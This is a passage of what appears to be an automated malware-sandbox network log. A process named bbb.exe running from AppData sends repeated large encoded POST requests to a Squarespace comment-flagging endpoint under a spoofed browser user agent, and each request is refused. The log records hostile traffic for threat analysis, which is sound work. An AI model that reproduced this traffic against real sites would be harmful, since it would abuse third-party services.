45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjZ9pYGfynWtasNkXSUsTZ05IwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:53 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BXlwc0hnEdByZTdkOGVmNjhkYWRhZjFhNTIyNmEzM2Q5OTc0NDky; Path=/; Secure Set-Cookie: crumb=BVTTfI6EMTQDZTZiYmJjNDM2NDZiMGQ5MjU3OTBjODUwMzQyMzk4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: i5BsFJAl/daT0Nfcl Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVTTfI6EMTQDZTZiYmJjNDM2NDZiMGQ5MjU3OTBjODUwMzQyMzk4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49860	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:54 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108762 Expect: 100-continue
2024-09-01 19:56:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 42 74 47 65 64 4d 54 6e 33 6b 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzBtGedMTn3knbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 49 Data Ascii: I
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 54 32 37 2f 49 67 42 7a 73 36 52 33 4c 35 72 45 67 72 6f 45 74 49 47 70 25 32 42 65 62 4c 7a 50 61 71 46 77 6c 6f 4a 68 72 38 37 6f 46 76 6f 77 47 49 31 74 63 33 6b 56 68 59 4b 36 6d 61 75 53 79 5a 69 65 33 35 63 33 69 57 77 5a 35 6c 78 63 53 74 41 39 4f 45 4e 78 56 63 54 33 64 72 56 78 30 46 47 46 6e 44 78 6f 42 41 4e 78 63 69 38 38 38 39 55 6d 39 75 63 48 25 32 42 41 66 54 63 4d 79 55 6c 67 4d 62 38 37 31 69 6a 56 57 6a 6d 36 52 73 38 39 68 48 42 74 78 73 50 41 31 79 58 4e 35 62 7a 6e 63 76 52 2f 39 45 6b 79 4d 78 6a 68 39 37 4a 6e 34 69 62 53 4c 79 42 7a 66 59 48 5a 31 68 76 68 4b 79 6b 72 36 6b 63 56 39 59 37 59 43 73 32 35 45 6d 4b 5a 79 4d 74 44 7a 42 36 36 31 25 32 42 47 39 7a 63 4d 37 36 58 50 30 73 34 57 6b 35 6e 33 41 38 34 42 4a 69 30 6e 53 74 Data Ascii: T27/IgBzs6R3L5rEgroEtIGp%2BebLzPaqFwloJhr87oFvowGI1tc3kVhYK6mauSyZie35c3iWwZ5lxcStA9OENxVcT3drVx0FGFnDxoBANxci8889Um9ucH%2BAfTcMyUlgMb871ijVWjm6Rs89hHBtxsPA1yXN5bzncvR/9EkyMxjh97Jn4ibSLyBzfYHZ1hvhKykr6kcV9Y7YCs25EmKZyMtDzB661%2BG9zcM76XP0s4Wk5n3A84BJi0nSt
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 33 Data Ascii: 3
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 32 56 70 54 62 72 75 62 25 32 42 73 37 37 62 51 58 74 4f 68 76 32 47 66 72 79 58 72 42 37 47 69 6c 4a 49 76 63 6d 63 70 43 34 30 73 45 4e 4b 4a 30 31 6e 6e 67 33 71 41 68 71 63 56 51 43 71 6d 37 56 54 6e 67 4e 38 47 74 43 49 5a 38 73 32 66 42 47 71 35 42 41 76 75 6c 30 4d 55 53 45 79 35 72 36 49 56 53 45 4d 46 38 25 32 42 38 4e 66 69 51 4f 35 67 65 49 35 78 50 4a 54 6e 62 48 38 63 4e 4b 67 70 45 4d 56 4c 66 67 70 42 54 4e 58 72 31 54 62 6f 51 50 77 7a 25 32 42 69 45 74 54 67 68 48 61 45 62 59 50 53 68 4f 39 4b 68 78 4a 46 57 66 69 6e 2f 58 66 53 31 64 49 4f 54 74 47 32 66 49 30 32 43 55 76 66 64 69 57 59 78 45 6f 70 68 58 6c 6d 73 62 55 5a 50 56 6d 43 50 62 31 44 39 61 5a 6a 70 6b 50 78 35 72 47 31 47 54 31 5a 67 6a 32 39 51 2f 57 6d 59 36 5a 44 38 65 61 Data Ascii: 2VpTbrub%2Bs77bQXtOhv2GfryXrB7GilJIvcmcpC40sENKJ01nng3qAhqcVQCqm7VTngN8GtCIZ8s2fBGq5BAvul0MUSEy5r6IVSEMF8%2B8NfiQO5geI5xPJTnbH8cNKgpEMVLfgpBTNXr1TboQPwz%2BiEtTghHaEbYPShO9KhxJFWfin/XfS1dIOTtG2fI02CUvfdiWYxEophXlmsbUZPVmCPb1D9aZjpkPx5rG1GT1Zgj29Q/WmY6ZD8ea
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 55 51 31 65 64 49 6e 34 36 7a 6d 30 54 52 42 66 79 48 37 42 6f 6f 53 55 31 6f 50 31 71 65 4a 56 6a 76 4f 51 58 6e 71 62 73 46 63 72 75 6f 74 4f 46 68 57 46 51 4b 64 7a 64 33 76 64 70 49 47 50 74 70 25 32 42 53 49 6d 41 43 53 61 47 57 79 48 64 73 6f 59 59 41 4e 37 39 50 4c 75 65 30 7a 72 59 4f 6d 25 32 42 39 4b 44 65 37 55 34 76 36 45 5a 74 43 54 51 6b 54 58 51 79 4b 4a 65 46 30 6a 79 6f 44 41 72 42 39 52 68 42 43 4a 33 44 37 45 50 67 4e 4d 37 4d 38 30 57 39 52 79 63 4a 38 44 44 51 4e 66 47 53 6c 6c 33 77 31 76 50 68 62 59 74 6e 53 47 7a 42 36 33 4d 54 64 61 34 62 4e 58 67 45 50 66 68 35 50 51 78 48 41 42 57 6f 55 38 76 79 48 66 62 2f 63 72 57 6f 62 44 64 32 52 71 57 62 38 73 2f 62 48 46 6e 4f 49 78 51 58 79 78 62 73 78 43 48 45 68 58 68 64 47 5a 25 32 42 Data Ascii: UQ1edIn46zm0TRBfyH7BooSU1oP1qeJVjvOQXnqbsFcruotOFhWFQKdzd3vdpIGPtp%2BSImACSaGWyHdsoYYAN79PLue0zrYOm%2B9KDe7U4v6EZtCTQkTXQyKJeF0jyoDArB9RhBCJ3D7EPgNM7M80W9RycJ8DDQNfGSll3w1vPhbYtnSGzB63MTda4bNXgEPfh5PQxHABWoU8vyHfb/crWobDd2RqWb8s/bHFnOIxQXyxbsxCHEhXhdGZ%2B
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 74 4e 33 4d 70 4f 38 51 68 71 6f 44 72 47 78 48 6e 58 4e 72 32 71 31 76 4d 70 74 70 33 61 7a 57 57 61 4f 58 36 36 6b 42 25 32 42 4d 75 6d 46 2f 5a 78 4e 70 74 50 73 37 73 59 71 53 6a 72 46 36 37 72 66 6a 77 47 5a 25 32 42 65 62 4c 7a 50 61 71 46 77 6b 30 4d 73 6e 4f 36 31 36 31 4d 6e 78 65 6f 55 64 69 59 77 53 34 79 76 79 56 2f 62 4a 37 73 32 69 53 61 51 56 36 77 47 2f 25 32 42 48 70 6a 61 6a 53 59 52 78 38 42 33 4a 2f 68 56 7a 39 69 73 70 6c 30 56 6f 30 2f 32 39 70 25 32 42 57 44 56 70 51 57 4e 53 6a 54 47 39 6e 79 43 5a 4a 4d 6c 63 33 68 66 4a 72 51 73 75 52 4b 44 6d 74 52 43 39 78 6a 63 38 65 5a 62 34 4f 37 38 62 46 36 65 33 4a 50 36 43 6f 47 72 4e 47 51 79 70 52 72 57 55 5a 6c 30 52 73 6f 50 63 67 67 31 72 7a 45 2f 5a 6d 4d 6f 68 2f 66 6a 61 56 6f 37 Data Ascii: tN3MpO8QhqoDrGxHnXNr2q1vMptp3azWWaOX66kB%2BMumF/ZxNptPs7sYqSjrF67rfjwGZ%2BebLzPaqFwk0MsnO6161MnxeoUdiYwS4yvyV/bJ7s2iSaQV6wG/%2BHpjajSYRx8B3J/hVz9ispl0Vo0/29p%2BWDVpQWNSjTG9nyCZJMlc3hfJrQsuRKDmtRC9xjc8eZb4O78bF6e3JP6CoGrNGQypRrWUZl0RsoPcgg1rzE/ZmMoh/fjaVo7
2024-09-01 19:56:54 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:54 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbkyukerslMWYTc4NTgzOWM1YWY3MWFiZTZiOTBlNGVkNjVhMTNm; Path=/; Secure Set-Cookie: crumb=BeQ_4MZrAUr2NTczNGYwZTc5ZmViNGUwMzg5ZTAzZDhhNjllZWU1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: yimm4b13/crnsuPMa Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeQ_4MZrAUr2NTczNGYwZTc5ZmViNGUwMzg5ZTAzZDhhNjllZWU1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	49861	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:54 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108762 Expect: 100-continue
2024-09-01 19:56:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 62 65 74 4b 33 6d 54 52 35 76 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzbetK3mTR5vnbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 49 Data Ascii: I
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 54 32 37 2f 49 67 42 7a 73 36 52 33 4c 35 72 45 67 72 6f 45 74 49 47 70 25 32 42 65 62 4c 7a 50 61 71 46 77 6c 6f 4a 68 72 38 37 6f 46 76 6f 77 47 49 31 74 63 33 6b 56 68 59 4b 36 6d 61 75 53 79 5a 69 65 33 35 63 33 69 57 77 5a 35 6c 78 63 53 74 41 39 4f 45 4e 78 56 63 54 33 64 72 56 78 30 46 47 46 6e 44 78 6f 42 41 4e 78 63 69 38 38 38 39 55 6d 39 75 63 48 25 32 42 41 66 54 63 4d 79 55 6c 67 4d 62 38 37 31 69 6a 56 57 6a 6d 36 52 73 38 39 68 48 42 74 78 73 50 41 31 79 58 4e 35 62 7a 6e 63 76 52 2f 39 45 6b 79 4d 78 6a 68 39 37 4a 6e 34 69 62 53 4c 79 42 7a 66 59 48 5a 31 68 76 68 4b 79 6b 72 36 6b 63 56 39 59 37 59 43 73 32 35 45 6d 4b 5a 79 4d 74 44 7a 42 36 36 31 25 32 42 47 39 7a 63 4d 37 36 58 50 30 73 34 57 6b 35 6e 33 41 38 34 42 4a 69 30 6e 53 74 Data Ascii: T27/IgBzs6R3L5rEgroEtIGp%2BebLzPaqFwloJhr87oFvowGI1tc3kVhYK6mauSyZie35c3iWwZ5lxcStA9OENxVcT3drVx0FGFnDxoBANxci8889Um9ucH%2BAfTcMyUlgMb871ijVWjm6Rs89hHBtxsPA1yXN5bzncvR/9EkyMxjh97Jn4ibSLyBzfYHZ1hvhKykr6kcV9Y7YCs25EmKZyMtDzB661%2BG9zcM76XP0s4Wk5n3A84BJi0nSt
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 33 Data Ascii: 3
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 32 56 70 54 62 72 75 62 25 32 42 73 37 37 62 51 58 74 4f 68 76 32 47 66 72 79 58 72 42 37 47 69 6c 4a 49 76 63 6d 63 70 43 34 30 73 45 4e 4b 4a 30 31 6e 6e 67 33 71 41 68 71 63 56 51 43 71 6d 37 56 54 6e 67 4e 38 47 74 43 49 5a 38 73 32 66 42 47 71 35 42 41 76 75 6c 30 4d 55 53 45 79 35 72 36 49 56 53 45 4d 46 38 25 32 42 38 4e 66 69 51 4f 35 67 65 49 35 78 50 4a 54 6e 62 48 38 63 4e 4b 67 70 45 4d 56 4c 66 67 70 42 54 4e 58 72 31 54 62 6f 51 50 77 7a 25 32 42 69 45 74 54 67 68 48 61 45 62 59 50 53 68 4f 39 4b 68 78 4a 46 57 66 69 6e 2f 58 66 53 31 64 49 4f 54 74 47 32 66 49 30 32 43 55 76 66 64 69 57 59 78 45 6f 70 68 58 6c 6d 73 62 55 5a 50 56 6d 43 50 62 31 44 39 61 5a 6a 70 6b 50 78 35 72 47 31 47 54 31 5a 67 6a 32 39 51 2f 57 6d 59 36 5a 44 38 65 61 Data Ascii: 2VpTbrub%2Bs77bQXtOhv2GfryXrB7GilJIvcmcpC40sENKJ01nng3qAhqcVQCqm7VTngN8GtCIZ8s2fBGq5BAvul0MUSEy5r6IVSEMF8%2B8NfiQO5geI5xPJTnbH8cNKgpEMVLfgpBTNXr1TboQPwz%2BiEtTghHaEbYPShO9KhxJFWfin/XfS1dIOTtG2fI02CUvfdiWYxEophXlmsbUZPVmCPb1D9aZjpkPx5rG1GT1Zgj29Q/WmY6ZD8ea
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 55 51 31 65 64 49 6e 34 36 7a 6d 30 54 52 42 66 79 48 37 42 6f 6f 53 55 31 6f 50 31 71 65 4a 56 6a 76 4f 51 58 6e 71 62 73 46 63 72 75 6f 74 4f 46 68 57 46 51 4b 64 7a 64 33 76 64 70 49 47 50 74 70 25 32 42 53 49 6d 41 43 53 61 47 57 79 48 64 73 6f 59 59 41 4e 37 39 50 4c 75 65 30 7a 72 59 4f 6d 25 32 42 39 4b 44 65 37 55 34 76 36 45 5a 74 43 54 51 6b 54 58 51 79 4b 4a 65 46 30 6a 79 6f 44 41 72 42 39 52 68 42 43 4a 33 44 37 45 50 67 4e 4d 37 4d 38 30 57 39 52 79 63 4a 38 44 44 51 4e 66 47 53 6c 6c 33 77 31 76 50 68 62 59 74 6e 53 47 7a 42 36 33 4d 54 64 61 34 62 4e 58 67 45 50 66 68 35 50 51 78 48 41 42 57 6f 55 38 76 79 48 66 62 2f 63 72 57 6f 62 44 64 32 52 71 57 62 38 73 2f 62 48 46 6e 4f 49 78 51 58 79 78 62 73 78 43 48 45 68 58 68 64 47 5a 25 32 42 Data Ascii: UQ1edIn46zm0TRBfyH7BooSU1oP1qeJVjvOQXnqbsFcruotOFhWFQKdzd3vdpIGPtp%2BSImACSaGWyHdsoYYAN79PLue0zrYOm%2B9KDe7U4v6EZtCTQkTXQyKJeF0jyoDArB9RhBCJ3D7EPgNM7M80W9RycJ8DDQNfGSll3w1vPhbYtnSGzB63MTda4bNXgEPfh5PQxHABWoU8vyHfb/crWobDd2RqWb8s/bHFnOIxQXyxbsxCHEhXhdGZ%2B
2024-09-01 19:56:54 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 19:56:54 UTC	16306	OUT	Data Raw: 74 4e 33 4d 70 4f 38 51 68 71 6f 44 72 47 78 48 6e 58 4e 72 32 71 31 76 4d 70 74 70 33 61 7a 57 57 61 4f 58 36 36 6b 42 25 32 42 4d 75 6d 46 2f 5a 78 4e 70 74 50 73 37 73 59 71 53 6a 72 46 36 37 72 66 6a 77 47 5a 25 32 42 65 62 4c 7a 50 61 71 46 77 6b 30 4d 73 6e 4f 36 31 36 31 4d 6e 78 65 6f 55 64 69 59 77 53 34 79 76 79 56 2f 62 4a 37 73 32 69 53 61 51 56 36 77 47 2f 25 32 42 48 70 6a 61 6a 53 59 52 78 38 42 33 4a 2f 68 56 7a 39 69 73 70 6c 30 56 6f 30 2f 32 39 70 25 32 42 57 44 56 70 51 57 4e 53 6a 54 47 39 6e 79 43 5a 4a 4d 6c 63 33 68 66 4a 72 51 73 75 52 4b 44 6d 74 52 43 39 78 6a 63 38 65 5a 62 34 4f 37 38 62 46 36 65 33 4a 50 36 43 6f 47 72 4e 47 51 79 70 52 72 57 55 5a 6c 30 52 73 6f 50 63 67 67 31 72 7a 45 2f 5a 6d 4d 6f 68 2f 66 6a 61 56 6f 37 Data Ascii: tN3MpO8QhqoDrGxHnXNr2q1vMptp3azWWaOX66kB%2BMumF/ZxNptPs7sYqSjrF67rfjwGZ%2BebLzPaqFwk0MsnO6161MnxeoUdiYwS4yvyV/bJ7s2iSaQV6wG/%2BHpjajSYRx8B3J/hVz9ispl0Vo0/29p%2BWDVpQWNSjTG9nyCZJMlc3hfJrQsuRKDmtRC9xjc8eZb4O78bF6e3JP6CoGrNGQypRrWUZl0RsoPcgg1rzE/ZmMoh/fjaVo7
2024-09-01 19:56:55 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:54 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSuKsKK9RaBWMGM4ZDIxNjk0NDI5YjVlNDNmMDgwYWEzYTRkZjkz; Path=/; Secure Set-Cookie: crumb=BYO0VzvvWfz8Mjk2OThjMGMyZTA2Y2VkZTM5NjAzMmUxYmUyOGY5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: UHQdPAtX/xnpFHOpd Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYO0VzvvWfz8Mjk2OThjMGMyZTA2Y2VkZTM5NjAzMmUxYmUyOGY5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	49862	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:55 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108762 Expect: 100-continue
2024-09-01 19:56:55 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 61 4b 48 51 71 67 4f 6d 76 50 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YxaKHQqgOmvPHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 49 Data Ascii: I
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 54 32 37 2f 49 67 42 7a 73 36 52 33 4c 35 72 45 67 72 6f 45 74 49 47 70 25 32 42 65 62 4c 7a 50 61 71 46 77 6c 6f 4a 68 72 38 37 6f 46 76 6f 77 47 49 31 74 63 33 6b 56 68 59 4b 36 6d 61 75 53 79 5a 69 65 33 35 63 33 69 57 77 5a 35 6c 78 63 53 74 41 39 4f 45 4e 78 56 63 54 33 64 72 56 78 30 46 47 46 6e 44 78 6f 42 41 4e 78 63 69 38 38 38 39 55 6d 39 75 63 48 25 32 42 41 66 54 63 4d 79 55 6c 67 4d 62 38 37 31 69 6a 56 57 6a 6d 36 52 73 38 39 68 48 42 74 78 73 50 41 31 79 58 4e 35 62 7a 6e 63 76 52 2f 39 45 6b 79 4d 78 6a 68 39 37 4a 6e 34 69 62 53 4c 79 42 7a 66 59 48 5a 31 68 76 68 4b 79 6b 72 36 6b 63 56 39 59 37 59 43 73 32 35 45 6d 4b 5a 79 4d 74 44 7a 42 36 36 31 25 32 42 47 39 7a 63 4d 37 36 58 50 30 73 34 57 6b 35 6e 33 41 38 34 42 4a 69 30 6e 53 74 Data Ascii: T27/IgBzs6R3L5rEgroEtIGp%2BebLzPaqFwloJhr87oFvowGI1tc3kVhYK6mauSyZie35c3iWwZ5lxcStA9OENxVcT3drVx0FGFnDxoBANxci8889Um9ucH%2BAfTcMyUlgMb871ijVWjm6Rs89hHBtxsPA1yXN5bzncvR/9EkyMxjh97Jn4ibSLyBzfYHZ1hvhKykr6kcV9Y7YCs25EmKZyMtDzB661%2BG9zcM76XP0s4Wk5n3A84BJi0nSt
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 33 Data Ascii: 3
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 32 56 70 54 62 72 75 62 25 32 42 73 37 37 62 51 58 74 4f 68 76 32 47 66 72 79 58 72 42 37 47 69 6c 4a 49 76 63 6d 63 70 43 34 30 73 45 4e 4b 4a 30 31 6e 6e 67 33 71 41 68 71 63 56 51 43 71 6d 37 56 54 6e 67 4e 38 47 74 43 49 5a 38 73 32 66 42 47 71 35 42 41 76 75 6c 30 4d 55 53 45 79 35 72 36 49 56 53 45 4d 46 38 25 32 42 38 4e 66 69 51 4f 35 67 65 49 35 78 50 4a 54 6e 62 48 38 63 4e 4b 67 70 45 4d 56 4c 66 67 70 42 54 4e 58 72 31 54 62 6f 51 50 77 7a 25 32 42 69 45 74 54 67 68 48 61 45 62 59 50 53 68 4f 39 4b 68 78 4a 46 57 66 69 6e 2f 58 66 53 31 64 49 4f 54 74 47 32 66 49 30 32 43 55 76 66 64 69 57 59 78 45 6f 70 68 58 6c 6d 73 62 55 5a 50 56 6d 43 50 62 31 44 39 61 5a 6a 70 6b 50 78 35 72 47 31 47 54 31 5a 67 6a 32 39 51 2f 57 6d 59 36 5a 44 38 65 61 Data Ascii: 2VpTbrub%2Bs77bQXtOhv2GfryXrB7GilJIvcmcpC40sENKJ01nng3qAhqcVQCqm7VTngN8GtCIZ8s2fBGq5BAvul0MUSEy5r6IVSEMF8%2B8NfiQO5geI5xPJTnbH8cNKgpEMVLfgpBTNXr1TboQPwz%2BiEtTghHaEbYPShO9KhxJFWfin/XfS1dIOTtG2fI02CUvfdiWYxEophXlmsbUZPVmCPb1D9aZjpkPx5rG1GT1Zgj29Q/WmY6ZD8ea
2024-09-01 19:56:55 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 19:56:55 UTC	16306	OUT	Data Raw: 55 51 31 65 64 49 6e 34 36 7a 6d 30 54 52 42 66 79 48 37 42 6f 6f 53 55 31 6f 50 31 71 65 4a 56 6a 76 4f 51 58 6e 71 62 73 46 63 72 75 6f 74 4f 46 68 57 46 51 4b 64 7a 64 33 76 64 70 49 47 50 74 70 25 32 42 53 49 6d 41 43 53 61 47 57 79 48 64 73 6f 59 59 41 4e 37 39 50 4c 75 65 30 7a 72 59 4f 6d 25 32 42 39 4b 44 65 37 55 34 76 36 45 5a 74 43 54 51 6b 54 58 51 79 4b 4a 65 46 30 6a 79 6f 44 41 72 42 39 52 68 42 43 4a 33 44 37 45 50 67 4e 4d 37 4d 38 30 57 39 52 79 63 4a 38 44 44 51 4e 66 47 53 6c 6c 33 77 31 76 50 68 62 59 74 6e 53 47 7a 42 36 33 4d 54 64 61 34 62 4e 58 67 45 50 66 68 35 50 51 78 48 41 42 57 6f 55 38 76 79 48 66 62 2f 63 72 57 6f 62 44 64 32 52 71 57 62 38 73 2f 62 48 46 6e 4f 49 78 51 58 79 78 62 73 78 43 48 45 68 58 68 64 47 5a 25 32 42 Data Ascii: 